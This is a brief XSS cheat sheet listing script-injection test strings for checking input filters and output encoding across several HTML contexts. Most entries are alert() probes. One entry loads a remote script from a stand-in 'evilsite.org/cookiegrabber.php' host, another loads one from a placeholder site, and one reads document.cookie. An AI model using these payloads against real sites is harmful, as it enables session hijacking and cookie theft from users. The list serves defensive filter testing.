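XSS Cheat Sheet

Test strings for checking that input filtering and context-aware output encoding neutralise script injection. The entries cover several injection contexts: the HTML body, a quoted attribute value, title and textarea content, BBCode links, and event-handler attributes. The LOWSRC, DYNSRC, CSS expression() and javascript:-in-image-source entries only ran in legacy browsers and do not execute in current ones; they remain useful for checking filter coverage.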


  • <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  • "><script>alert(0)</script>
  • <script src=http://yoursite.com/your_files.js></script>
  • </title><script>alert(/xss/)</script>
  • </textarea><script>alert(/xss/)</script>
  • <IMG LOWSRC=\"javascript:alert('XSS')\">
  • <IMG DYNSRC=\"javascript:alert('XSS')\">
  • <font style='color:expression(alert(document.cookie))'>
  • <img src="javascript:alert('XSS')">
  • <script language="JavaScript">alert('XSS')</script>
  • [url=javascript:alert('XSS');]click me[/url]
  • <body onunload="javascript:alert('XSS');">
  • <script>alert(1);</script>
  • <script>alert('XSS');</script>
  • <script src="http://www.evilsite.org/cookiegrabber.php"></script>